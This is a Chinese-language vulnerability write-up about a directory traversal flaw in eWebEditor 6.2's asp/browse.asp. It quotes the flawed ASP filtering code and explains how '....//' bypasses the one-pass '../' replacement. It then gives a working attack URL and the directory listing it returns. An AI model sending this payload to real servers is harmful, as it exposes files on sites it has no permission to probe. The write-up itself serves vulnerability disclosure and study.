手机
当前位置:查字典教程网 >网络安全 >漏洞分析 >eWebEditor 6.2 目录遍历漏洞(asp/browse.asp)
eWebEditor 6.2 目录遍历漏洞(asp/browse.asp)
摘要:asp/browse.asp部分源码:复制代码代码如下:Dims_ReturnFlag,s_FolderType,s_DirDims_Cur...

asp/browse.asp部分源码:

复制代码代码如下:

Dim s_ReturnFlag, s_FolderType, s_Dir

Dim s_CurrDir

s_ReturnFlag = Trim(Request.QueryString("returnflag"))

s_FolderType = Trim(Request.QueryString("foldertype"))

s_Dir = Trim(Request("dir"))

Select Case s_FolderType

Case "upload"

s_CurrDir = sUploadDir

Case "shareimage"

sAllowExt = ""

s_CurrDir = sPathShareImage

Case "shareflash"

sAllowExt = ""

s_CurrDir = sPathShareFlash

Case "sharemedia"

sAllowExt = ""

s_CurrDir = sPathShareMedia

Case Else

s_FolderType = "shareother"

sAllowExt = ""

s_CurrDir = sPathShareOther

End Select

s_Dir = Replace(s_Dir, "", "/")

'下面两行是对目录跳转的处理,漏洞存在于此处

s_Dir = Replace(s_Dir, "../", "") '替换../为空

s_Dir = Replace(s_Dir, "./", "") '替换./为空

If Left(s_Dir,1)="/" Then

s_Dir = ""

End If

Dim s_Dir2

s_Dir2 = Replace(s_Dir, "/", "")

If s_Dir <> "" Then

If CheckValidDir(s_CurrDir & s_Dir2) = True Then

s_CurrDir = s_CurrDir & s_Dir2

Else

s_Dir = ""

End If

End If

代码对../和./进行过滤用来防止目录跳转,但可以通过构造参数饶过检测.由于检测替换只进行一次可以使用....//代替上级目录,程序替换后....//变成../

攻击代码示例:

http://localhost/asp/browse.asp?action=file&type=file&dir=.....///DiaLog&style=full650&cusdir=&foldertype=upload&returnflag=span_upload

跳转到上eWebEditor的DiaLog目录,查看返回页面的源文件:

复制代码代码如下:

<HTML><HEAD><meta http-equiv='Content-Type' content='text/html; charset=gb2312'><TITLE>eWebEditor</TITLE></head><body><script language=javascript>var arr = new Array();

arr[0]=new Array("about.htm", "1.85 KB","2009-05-29 16:27:06");

arr[1]=new Array("anchor.htm", "3.68 KB","2009-05-13 16:39:40");

arr[2]=new Array("art.htm", "49.55 KB","2009-05-13 16:39:40");

arr[3]=new Array("backimage.htm", "9.46 KB","2009-05-13 16:39:42");

arr[4]=new Array("browse.htm", "20.74 KB","2009-05-13 16:39:42");

arr[5]=new Array("dialog.js", "6.44 KB","2009-05-13 22:39:08");

arr[6]=new Array("emot.htm", "3.26 KB","2009-05-13 16:39:42");

arr[7]=new Array("EQ.htm", "3.48 KB","2009-05-14 00:02:20");

arr[8]=new Array("eWebEditorActiveX.CAB", "1118.08 KB","2009-05-14 00:18:40");

arr[9]=new Array("eWebEditorActiveXInstall.exe", "1190.72 KB","2009-04-11 23:12:48");

arr[10]=new Array("fieldset.htm", "4.11 KB","2009-05-13 16:39:42");

arr[11]=new Array("file.htm", "5.52 KB","2009-05-13 16:39:42");

arr[12]=new Array("findreplace.htm", "2.82 KB","2009-05-13 16:39:42");

arr[13]=new Array("flash.htm", "14.43 KB","2009-05-13 16:39:42");

arr[14]=new Array("fullscreen.htm", "0.84 KB","2009-05-13 16:39:42");

arr[15]=new Array("hyperlink.htm", "4.43 KB","2009-05-13 16:39:42");

arr[16]=new Array("iFrame.htm", "4.24 KB","2009-05-14 00:31:30");

arr[17]=new Array("img.htm", "13.25 KB","2009-05-13 16:39:42");

arr[18]=new Array("importexcel.htm", "5.87 KB","2009-05-13 16:39:42");

arr[19]=new Array("importword.htm", "8.44 KB","2009-05-13 16:39:42");

arr[20]=new Array("installactivex.htm", "2.02 KB","2009-05-13 16:39:42");

arr[21]=new Array("i_upload.htm", "7.95 KB","2009-05-13 22:41:40");

arr[22]=new Array("map.htm", "4.13 KB","2009-05-13 16:39:42");

arr[23]=new Array("marquee.htm", "2.44 KB","2009-05-13 16:39:42");

arr[24]=new Array("media.htm", "5.07 KB","2009-05-13 16:39:42");

arr[25]=new Array("owcexcel.htm", "2.64 KB","2009-05-13 16:39:42");

arr[26]=new Array("paragraph.htm", "5.95 KB","2009-05-13 16:39:42");

arr[27]=new Array("paste.htm", "4.50 KB","2009-05-13 16:39:42");

arr[28]=new Array("quickformat.htm", "13.58 KB","2009-05-13 16:39:42");

arr[29]=new Array("selcolor.htm", "14.93 KB","2009-05-13 16:39:42");

arr[30]=new Array("symbol.htm", "14.61 KB","2009-05-13 16:39:42");

arr[31]=new Array("table.htm", "11.71 KB","2009-05-13 16:39:42");

arr[32]=new Array("tablecell.htm", "7.98 KB","2009-05-13 16:39:42");

arr[33]=new Array("tablecellsplit.htm", "2.55 KB","2009-05-13 16:39:42");

arr[34]=new Array("template.htm", "4.50 KB","2009-05-13 16:39:42");

arr[35]=new Array("WebEQInstall.cab", "1123.39 KB","2009-05-14 00:16:16");

parent.setFileList('span_upload', 'upload', '../DiaLog', arr);</script></body></html>

【eWebEditor 6.2 目录遍历漏洞(asp/browse.asp)】相关文章:

FTP客户端目录遍历漏洞可向任意位置写文件

Microsoft SharePoint Server跨站脚本漏洞

DedeCms V5 orderby参数注射漏洞

F2blog XMLRPC 上传任意文件漏洞

Adobe Flash Player 9.0.124.0 修改多个安全漏洞

URL解析漏洞在PDF文档中的利用

discuz!7.1、7.2 远程代码执行漏洞exp

Cisco Unified IP Phone SCCP及SIP 协议安全漏洞

Adobe Acrobat 存在URL处理命名注入漏洞

Windows DNS客户端可预测事件处理ID漏洞

精品推荐
分类导航